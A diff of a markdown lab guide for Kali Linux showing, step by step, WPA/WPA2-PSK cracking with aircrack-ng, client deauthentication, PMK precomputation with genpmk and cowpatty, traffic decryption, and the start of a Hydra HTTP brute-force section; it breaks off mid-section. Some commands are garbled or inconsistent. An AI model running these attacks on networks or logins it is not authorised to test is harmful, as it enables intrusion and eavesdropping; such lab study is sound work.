luk4sf/Guides/kaliWirelessBasics.md

 Now just run *aircrack-ng WEPDemo-02.cap* to crack the key using the data collected by airodump-ng.
 This depends on the network speed and the key strength but shouldn't take much longer then 5-10 minutes.

+# How to crack WPA/WPA2 networks which are using PSK

+run *airodump-ng wlan0mon* to find out the MAC address of the target router and the channel its operating in.

+Then run *airodump-ng -c 5 -a --bssid 3C:84:6A:DF:AB:7C wlan0mon --write WPACrackingDemo* with -c set to the channel, in this case 11 and bssid to the MAC of the router.

+Now we force the other clients to reconnect or wait till someone connects. run *aireplay-ng --deauth 1 -a 3C:84:6A:DF:AB:7C wlan0mon --ignore-negative-one*.
+Now if the *Auth* section of airodump reads *PSK*, we can stop airodump, otherwise retry.

+Crack the file using aircrack utility with the command *aircrack-ng Wsudo aircrack-ng WPACrackingDemo-01.cap -w /usr/share/wordlists/nmap.lst* using our captured .cap file and a wordlist preinstalled from kali.
+(Important, the worldlist is everything here so optimizing it for the region you are in or including know information is a good idea.)

+Of course in this example it will find the key since we included it in the wordlist but it only works if the key is in the wordlist!

+# Speeding up the cracking process

+The calculation of the Pre-Shared key using the PSK passphrase and the SSID through the PBKDF2 is very time/CPU consuming.
+The next step, which uses the key along with the parameters in the four-way handshake and verifying it against the MIC in the handshake is inexpensive and has different parameters everytime so we cannot precompute it.
+So we try to speed up the PSK (also called the Pairwise Master Key(PMK)) calculation as much as possible.

+Precalculate the PMK for a give SSID and worklist using *genpmk*.
+Run *sudo genpmk -f /usr/share/wordlists/nmap.lst -d PMK-WirelessLab -s "Wireless Lab"*

+Now crack the WPA/WPA2 passphrase using a different tool for variety cowpatty.
+Run *cowpatty -d PMK-WirelessLab -s "Wireless Lab" -r WPACrackingDemo-01.cap*

+# Decrypting WPA packets

+Use *airedecap-ng* to decrypt packages we captured.
+Run *sudo airdecap-ng -p abcdefgh -e "Wireless Lab" WPACrackingDemo-01.cap*

+Now the decrypted packages are stored in *WPACrackingDemo-01-dec.cap* and can be analyzed using Wireshark or sth like *tshark*.
+E.g. *tshark -r WPACrackingDemo-01-dec.cap *

+# Use Hydra to crack HTTP authentication

+In this case we generate a wordlist first to brute-force the password.
+Run *sudo crunch 8 8 abcdefghi -o testWordlist.txt* to create a wordlist containing from 8 to 8  characters all possible combinations of the letters abcdefghi and writes it in the specified file.

+After this it gets a little tricky since we need to analyze the webpage in order to understand how it processes the password.
+We need to know if it is a POST or a GET request and alter the options accordingly.
+For this inspect the network tab in the browser.